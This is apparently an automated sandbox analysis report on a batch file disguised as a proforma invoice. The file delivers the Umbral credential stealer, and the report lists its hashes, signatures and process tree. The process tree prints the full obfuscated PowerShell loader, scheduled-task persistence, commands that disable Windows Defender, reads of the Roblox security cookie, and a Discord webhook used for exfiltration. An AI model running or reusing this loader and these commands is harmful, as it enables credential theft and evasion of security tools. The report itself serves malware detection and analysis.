Analysis
-
max time kernel
138s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24-07-2024 12:23
Static task
static1
Behavioral task
behavioral1
Sample
z1Proforma_invo.bat
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
z1Proforma_invo.bat
Resource
win10v2004-20240709-en
General
-
Target
z1Proforma_invo.bat
-
Size
232KB
-
MD5
7ebd033260b1e54dff5afd7c6534cf33
-
SHA1
cfb7040938237156fa3795755c77eecd7957bc39
-
SHA256
e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e
-
SHA512
18175d028e1a0541c3c3f8221173c4e9004a14a4642bf34c6cb7ec660facb74f5c91e5ee8d8677d833cc5fe6d067ea6cb40e641524d909056b8daedc21d2682f
-
SSDEEP
6144:FAWrhrgGAavaCnw8PaaEnyLzdyWEklez+3PDUi4WQZ5q:KWr5Mt+wezdTeK3LUi1QZM
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1263026563675455508/40rqdx690bYgnTu5DlgourQDtU8ZayQ2_Y8DutOY8G3wIW-x3nALBQHeaH44QkXBTtII
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/3704-106-0x0000027CAD190000-0x0000027CAD1D0000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 22 3704 powershell.exe 24 3704 powershell.exe 29 3704 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 1160 powershell.exe 856 powershell.exe 3284 powershell.exe 2032 powershell.exe 5000 powershell.exe 1764 powershell.exe 2700 powershell.exe 4140 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 28 discord.com 29 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3288 wmic.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
pid Process 3596 powershell.exe 3596 powershell.exe 1160 powershell.exe 1160 powershell.exe 1976 powershell.exe 1976 powershell.exe 856 powershell.exe 856 powershell.exe 3704 powershell.exe 3704 powershell.exe 3284 powershell.exe 3284 powershell.exe 3284 powershell.exe 2848 powershell.exe 2848 powershell.exe 2848 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 5000 powershell.exe 5000 powershell.exe 5000 powershell.exe 2700 powershell.exe 2700 powershell.exe 2700 powershell.exe 4140 powershell.exe 4140 powershell.exe 4140 powershell.exe 4056 powershell.exe 4056 powershell.exe 4056 powershell.exe 1764 powershell.exe 1764 powershell.exe 1764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3596 powershell.exe Token: SeDebugPrivilege 1160 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeIncreaseQuotaPrivilege 1976 powershell.exe Token: SeSecurityPrivilege 1976 powershell.exe Token: SeTakeOwnershipPrivilege 1976 powershell.exe Token: SeLoadDriverPrivilege 1976 powershell.exe Token: SeSystemProfilePrivilege 1976 powershell.exe Token: SeSystemtimePrivilege 1976 powershell.exe Token: SeProfSingleProcessPrivilege 1976 powershell.exe Token: SeIncBasePriorityPrivilege 1976 powershell.exe Token: SeCreatePagefilePrivilege 1976 powershell.exe Token: SeBackupPrivilege 1976 powershell.exe Token: SeRestorePrivilege 1976 powershell.exe Token: SeShutdownPrivilege 1976 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeSystemEnvironmentPrivilege 1976 powershell.exe Token: SeRemoteShutdownPrivilege 1976 powershell.exe Token: SeUndockPrivilege 1976 powershell.exe Token: SeManageVolumePrivilege 1976 powershell.exe Token: 33 1976 powershell.exe Token: 34 1976 powershell.exe Token: 35 1976 powershell.exe Token: 36 1976 powershell.exe Token: SeDebugPrivilege 856 powershell.exe Token: SeIncreaseQuotaPrivilege 856 powershell.exe Token: SeSecurityPrivilege 856 powershell.exe Token: SeTakeOwnershipPrivilege 856 powershell.exe Token: SeLoadDriverPrivilege 856 powershell.exe Token: SeSystemProfilePrivilege 856 powershell.exe Token: SeSystemtimePrivilege 856 powershell.exe Token: SeProfSingleProcessPrivilege 856 powershell.exe Token: SeIncBasePriorityPrivilege 856 powershell.exe Token: SeCreatePagefilePrivilege 856 powershell.exe Token: SeBackupPrivilege 856 powershell.exe Token: SeRestorePrivilege 856 powershell.exe Token: SeShutdownPrivilege 856 powershell.exe Token: SeDebugPrivilege 856 powershell.exe Token: SeSystemEnvironmentPrivilege 856 powershell.exe Token: SeRemoteShutdownPrivilege 856 powershell.exe Token: SeUndockPrivilege 856 powershell.exe Token: SeManageVolumePrivilege 856 powershell.exe Token: 33 856 powershell.exe Token: 34 856 powershell.exe Token: 35 856 powershell.exe Token: 36 856 powershell.exe Token: SeIncreaseQuotaPrivilege 856 powershell.exe Token: SeSecurityPrivilege 856 powershell.exe Token: SeTakeOwnershipPrivilege 856 powershell.exe Token: SeLoadDriverPrivilege 856 powershell.exe Token: SeSystemProfilePrivilege 856 powershell.exe Token: SeSystemtimePrivilege 856 powershell.exe Token: SeProfSingleProcessPrivilege 856 powershell.exe Token: SeIncBasePriorityPrivilege 856 powershell.exe Token: SeCreatePagefilePrivilege 856 powershell.exe Token: SeBackupPrivilege 856 powershell.exe Token: SeRestorePrivilege 856 powershell.exe Token: SeShutdownPrivilege 856 powershell.exe Token: SeDebugPrivilege 856 powershell.exe Token: SeSystemEnvironmentPrivilege 856 powershell.exe Token: SeRemoteShutdownPrivilege 856 powershell.exe Token: SeUndockPrivilege 856 powershell.exe Token: SeManageVolumePrivilege 856 powershell.exe Token: 33 856 powershell.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 4364 wrote to memory of 2508 4364 cmd.exe 85 PID 4364 wrote to memory of 2508 4364 cmd.exe 85 PID 2508 wrote to memory of 3948 2508 cmd.exe 87 PID 2508 wrote to memory of 3948 2508 cmd.exe 87 PID 2508 wrote to memory of 3596 2508 cmd.exe 88 PID 2508 wrote to memory of 3596 2508 cmd.exe 88 PID 3596 wrote to memory of 1160 3596 powershell.exe 90 PID 3596 wrote to memory of 1160 3596 powershell.exe 90 PID 3596 wrote to memory of 1976 3596 powershell.exe 93 PID 3596 wrote to memory of 1976 3596 powershell.exe 93 PID 3596 wrote to memory of 856 3596 powershell.exe 98 PID 3596 wrote to memory of 856 3596 powershell.exe 98 PID 3596 wrote to memory of 4996 3596 powershell.exe 100 PID 3596 wrote to memory of 4996 3596 powershell.exe 100 PID 4996 wrote to memory of 1388 4996 cmd.exe 102 PID 4996 wrote to memory of 1388 4996 cmd.exe 102 PID 1388 wrote to memory of 2212 1388 cmd.exe 105 PID 1388 wrote to memory of 2212 1388 cmd.exe 105 PID 1388 wrote to memory of 3704 1388 cmd.exe 106 PID 1388 wrote to memory of 3704 1388 cmd.exe 106 PID 3704 wrote to memory of 3284 3704 powershell.exe 107 PID 3704 wrote to memory of 3284 3704 powershell.exe 107 PID 3704 wrote to memory of 2848 3704 powershell.exe 108 PID 3704 wrote to memory of 2848 3704 powershell.exe 108 PID 3704 wrote to memory of 2032 3704 powershell.exe 110 PID 3704 wrote to memory of 2032 3704 powershell.exe 110 PID 3704 wrote to memory of 5000 3704 powershell.exe 112 PID 3704 wrote to memory of 5000 3704 powershell.exe 112 PID 3704 wrote to memory of 2700 3704 powershell.exe 114 PID 3704 wrote to memory of 2700 3704 powershell.exe 114 PID 3704 wrote to memory of 4140 3704 powershell.exe 117 PID 3704 wrote to memory of 4140 3704 powershell.exe 117 PID 3704 wrote to memory of 4056 3704 powershell.exe 119 PID 3704 wrote to memory of 4056 3704 powershell.exe 119 PID 3704 wrote to memory of 4004 3704 powershell.exe 121 PID 3704 wrote to memory of 4004 3704 powershell.exe 121 PID 3704 wrote to memory of 4564 3704 powershell.exe 123 PID 3704 wrote to memory of 4564 3704 powershell.exe 123 PID 3704 wrote to memory of 3596 3704 powershell.exe 125 PID 3704 wrote to memory of 3596 3704 powershell.exe 125 PID 3704 wrote to memory of 1764 3704 powershell.exe 127 PID 3704 wrote to memory of 1764 3704 powershell.exe 127 PID 3704 wrote to memory of 3288 3704 powershell.exe 131 PID 3704 wrote to memory of 3288 3704 powershell.exe 131
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo.bat';$sYtF='EletEUVmetEUVnttEUVAtEUVttEUV'.Replace('tEUV', ''),'LoaSBYldSBYl'.Replace('SBYl', ''),'FrogfmnmBagfmnsgfmnegfmn64gfmnStgfmnrgfmninggfmn'.Replace('gfmn', ''),'MAiuvainAiuvMoAiuvdAiuvuAiuvleAiuv'.Replace('Aiuv', ''),'CnzHHopnzHHyTonzHH'.Replace('nzHH', ''),'TJVfkranJVfksfJVfkormJVfkFinJVfkaJVfklBJVfkloJVfkcJVfkkJVfk'.Replace('JVfk', ''),'InBujdvBujdoBujdkBujdeBujd'.Replace('Bujd', ''),'EuLNintuLNiryuLNiPuLNiouLNiiuLNintuLNi'.Replace('uLNi', ''),'GetQcPVCQcPVurQcPVrenQcPVtPQcPVrocQcPVesQcPVsQcPV'.Replace('QcPV', ''),'RefRLNadfRLNLifRLNnfRLNesfRLN'.Replace('fRLN', ''),'SmNIEplimNIEtmNIE'.Replace('mNIE', ''),'DedEEtcodEEtmdEEtprdEEtesdEEtsdEEt'.Replace('dEEt', ''),'ChadhQhndhQhgedhQhExdhQhtendhQhsidhQhondhQh'.Replace('dhQh', ''),'CvNhjreavNhjtevNhjDecvNhjryvNhjptvNhjovNhjrvNhj'.Replace('vNhj', '');powershell -w hidden;function rfZro($qxWYn){$tAnYl=[System.Security.Cryptography.Aes]::Create();$tAnYl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tAnYl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tAnYl.Key=[System.Convert]::($sYtF[2])('MqczF3Q/W2LU3CGZkY9zS+i5Q+bJVdWYQB5O4eBge5k=');$tAnYl.IV=[System.Convert]::($sYtF[2])('m1KVoTztYUoOwoqZpe9JdA==');$dHynp=$tAnYl.($sYtF[13])();$mirwI=$dHynp.($sYtF[5])($qxWYn,0,$qxWYn.Length);$dHynp.Dispose();$tAnYl.Dispose();$mirwI;}function SfByD($qxWYn){$fdQfc=New-Object System.IO.MemoryStream(,$qxWYn);$KNfPz=New-Object System.IO.MemoryStream;$tnctE=New-Object System.IO.Compression.GZipStream($fdQfc,[IO.Compression.CompressionMode]::($sYtF[11]));$tnctE.($sYtF[4])($KNfPz);$tnctE.Dispose();$fdQfc.Dispose();$KNfPz.Dispose();$KNfPz.ToArray();}$dzSzW=[System.IO.File]::($sYtF[9])([Console]::Title);$twvSq=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 5).Substring(2))));$xLxfI=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 6).Substring(2))));[System.Reflection.Assembly]::($sYtF[1])([byte[]]$xLxfI).($sYtF[7]).($sYtF[6])($null,$null);[System.Reflection.Assembly]::($sYtF[1])([byte[]]$twvSq).($sYtF[7]).($sYtF[6])($null,$null); "3⤵PID:3948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 26684' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\SC3.cmd"4⤵
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\SC3.cmd"5⤵
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\SC3.cmd';$sYtF='EletEUVmetEUVnttEUVAtEUVttEUV'.Replace('tEUV', ''),'LoaSBYldSBYl'.Replace('SBYl', ''),'FrogfmnmBagfmnsgfmnegfmn64gfmnStgfmnrgfmninggfmn'.Replace('gfmn', ''),'MAiuvainAiuvMoAiuvdAiuvuAiuvleAiuv'.Replace('Aiuv', ''),'CnzHHopnzHHyTonzHH'.Replace('nzHH', ''),'TJVfkranJVfksfJVfkormJVfkFinJVfkaJVfklBJVfkloJVfkcJVfkkJVfk'.Replace('JVfk', ''),'InBujdvBujdoBujdkBujdeBujd'.Replace('Bujd', ''),'EuLNintuLNiryuLNiPuLNiouLNiiuLNintuLNi'.Replace('uLNi', ''),'GetQcPVCQcPVurQcPVrenQcPVtPQcPVrocQcPVesQcPVsQcPV'.Replace('QcPV', ''),'RefRLNadfRLNLifRLNnfRLNesfRLN'.Replace('fRLN', ''),'SmNIEplimNIEtmNIE'.Replace('mNIE', ''),'DedEEtcodEEtmdEEtprdEEtesdEEtsdEEt'.Replace('dEEt', ''),'ChadhQhndhQhgedhQhExdhQhtendhQhsidhQhondhQh'.Replace('dhQh', ''),'CvNhjreavNhjtevNhjDecvNhjryvNhjptvNhjovNhjrvNhj'.Replace('vNhj', '');powershell -w hidden;function rfZro($qxWYn){$tAnYl=[System.Security.Cryptography.Aes]::Create();$tAnYl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tAnYl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tAnYl.Key=[System.Convert]::($sYtF[2])('MqczF3Q/W2LU3CGZkY9zS+i5Q+bJVdWYQB5O4eBge5k=');$tAnYl.IV=[System.Convert]::($sYtF[2])('m1KVoTztYUoOwoqZpe9JdA==');$dHynp=$tAnYl.($sYtF[13])();$mirwI=$dHynp.($sYtF[5])($qxWYn,0,$qxWYn.Length);$dHynp.Dispose();$tAnYl.Dispose();$mirwI;}function SfByD($qxWYn){$fdQfc=New-Object System.IO.MemoryStream(,$qxWYn);$KNfPz=New-Object System.IO.MemoryStream;$tnctE=New-Object System.IO.Compression.GZipStream($fdQfc,[IO.Compression.CompressionMode]::($sYtF[11]));$tnctE.($sYtF[4])($KNfPz);$tnctE.Dispose();$fdQfc.Dispose();$KNfPz.Dispose();$KNfPz.ToArray();}$dzSzW=[System.IO.File]::($sYtF[9])([Console]::Title);$twvSq=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 5).Substring(2))));$xLxfI=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 6).Substring(2))));[System.Reflection.Assembly]::($sYtF[1])([byte[]]$xLxfI).($sYtF[7]).($sYtF[6])($null,$null);[System.Reflection.Assembly]::($sYtF[1])([byte[]]$twvSq).($sYtF[7]).($sYtF[6])($null,$null); "6⤵PID:2212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe6⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\SC3')7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 26684' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 27⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4056
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption7⤵PID:4004
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory7⤵PID:4564
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid7⤵PID:3596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1764
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name7⤵
- Detects videocard installed
PID:3288
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53f01549ee3e4c18244797530b588dad9
SHA13e87863fc06995fe4b741357c68931221d6cc0b9
SHA25636b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA51273843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50
-
Filesize
3KB
MD50e585c3d55bf372f35f934ffca450035
SHA18ae5c63bd3875e4f2f44e23b595c671b3ab52754
SHA256d42af671f764b0412f17e71804212eca451ebe5c7ce658dfd78428daccc7654a
SHA512721ee0afbddb86d4d222b40ddad8892ba8501569e9b57deb2c1a78254730320cdb7ba9ac59d4bdf575fbdf034e72b2a8b7fc0b642b943e456335db07df62e0ad
-
Filesize
2KB
MD5e4de99c1795fd54aa87da05fa39c199c
SHA1dfaaac2de1490fae01104f0a6853a9d8fe39a9d7
SHA25623c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457
SHA512796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926
-
Filesize
1KB
MD59d662ecae338ca923a784422a86e9925
SHA1ccdbbd6f3a1801b13f503d92f5d48fe5041ab495
SHA256af4b4d21aa532d4ca4638e2d3c9a07760dfeb65fbe782319860130ba09b62d6e
SHA5125455380e241bd3f697a8697cac7bcce54a1dc323d33995067407bc92858bc2d2216f092cce674a87f3b2d9f34b61bb5b7b13c1b57d511f1540123d38cc7bf38e
-
Filesize
1KB
MD566efc53ff91b80197e410958e85e5acb
SHA1e83b8d736f4e00a43fb552234a2b9d5a038a453d
SHA256843bc715821806bca9378c87f0dffd72da15cdaff35fcd6da5b65f8c69fe15ab
SHA51286c4e1af41a0d848e4c0da33334b0289930b8e25d863c3654dc622298e8fc5359c714818c8d960ef9a7c3e1e59fb638c823a8880e86b7f5a879bff372ac0f518
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
948B
MD5966914e2e771de7a4a57a95b6ecfa8a9
SHA17a32282fd51dd032967ed4d9a40cc57e265aeff2
SHA25698d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba
SHA512dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5
-
Filesize
1KB
MD56f28ee8df4bdf5490a8b5ebe7d6b89cf
SHA16fd0961c27a4fe119bfe43e86410917f5dc2e2e9
SHA2566f64379097ea161522d22814fc0a69c0e337950826377712adceaa67d0baae51
SHA512416a3977862dade1534e04f2e2e8f8c7bb794c8e2313ff104a53b622b959bd5a28e8c4346bd703f0eb1c40dc4ffc7c7c5d74c5c5d138089c1fdde9dadd5051f7
-
Filesize
1KB
MD56eda60a88afdf7c7c83aace97cd17d70
SHA14333df3e55ab774e3d4178aada00007a8c753d39
SHA2561004b5e98b5c2180df20729b5d52177d24f8b6aeb8f3adb528b2272aebcfce55
SHA5124877068c8248c23da7ecddfe9a8e69a8db1d302f18cea1df0c48ef6c50f8f6276af80ad86be49a52804a3ddc49be9b28a6e47c7a43f12aa48ee607cbb12caadf
-
Filesize
1KB
MD5644c38783c7f6c2a5ddd084802b170d4
SHA140596f06a35c639e3f5e65ebe61ba69c98fba5c0
SHA25687afca344ea480042c739717336bef808be1f32ba1e83e867b8f0459053adde5
SHA512135ee3be69ef3ccc2cd521c89f51d83df12cbd0638f3918df6422790f6bf40c18d8bc92c00b61b898335ca98c2ef4a7956ea12f5d02846a9f5f7d1ec81ad2e0d
-
Filesize
1KB
MD58eb06951b48b364432a3757eec6bd5af
SHA1df0b71da69535d6b846c4fb151756205a94a661e
SHA256da759628424de3646d7031abfc03a213b72a8d9a2e2fce1f5c643faf86519c97
SHA5122764e05a7297577eab32263c578ac76acfeccbf019757bc6c94c975af22014f563f180ccda4a12751756b412e269b57ddca1f2b1362c8acaaef7962b6e4edb0c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
232KB
MD57ebd033260b1e54dff5afd7c6534cf33
SHA1cfb7040938237156fa3795755c77eecd7957bc39
SHA256e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e
SHA51218175d028e1a0541c3c3f8221173c4e9004a14a4642bf34c6cb7ec660facb74f5c91e5ee8d8677d833cc5fe6d067ea6cb40e641524d909056b8daedc21d2682f